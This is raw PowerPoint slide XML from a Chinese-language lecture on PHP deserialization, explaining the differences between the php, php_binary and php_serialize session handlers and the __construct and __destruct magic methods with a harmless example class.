              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="240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98232018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反序列化</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序列化处理器的区别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9096E20-D412-004C-8415-9495C465F15A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="1888668"/>
            <a:ext cx="9845040" cy="1005788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>键名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>＋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>竖线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>＋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>serialize() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数反序列处理的值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E747238D-8255-284E-AEDF-597A0C821989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="3099880"/>
            <a:ext cx="9845040" cy="1485920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php_binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>键名的长度对应的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符 ＋ 键名 ＋ 经过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>serialize() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数反序列处理的值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9052BA5E-348F-7D4F-A8A2-F159E9469C4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="4791224"/>
            <a:ext cx="9845040" cy="1005788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php_serialize (php&gt;=5.5.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FE0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>serialize() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数反序列处理的数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422446972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反序列化</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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __construct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3370F42C-1175-0049-8283-602EB3DDC529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2657178"/>
            <a:ext cx="9494520" cy="3408049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__construct</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name</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amy</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sex</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male</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age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</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name</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2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sex</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sex</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2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>age</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age</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a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_construct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在对象诞生时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>调用，一般用来</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>为成员属性赋初值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277191196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反序列化</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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __destruct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_destruct</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在对象</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>销毁</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA5DED4-3515-9941-A0C5-931B6B49ECEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2690336"/>
            <a:ext cx="7604760" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
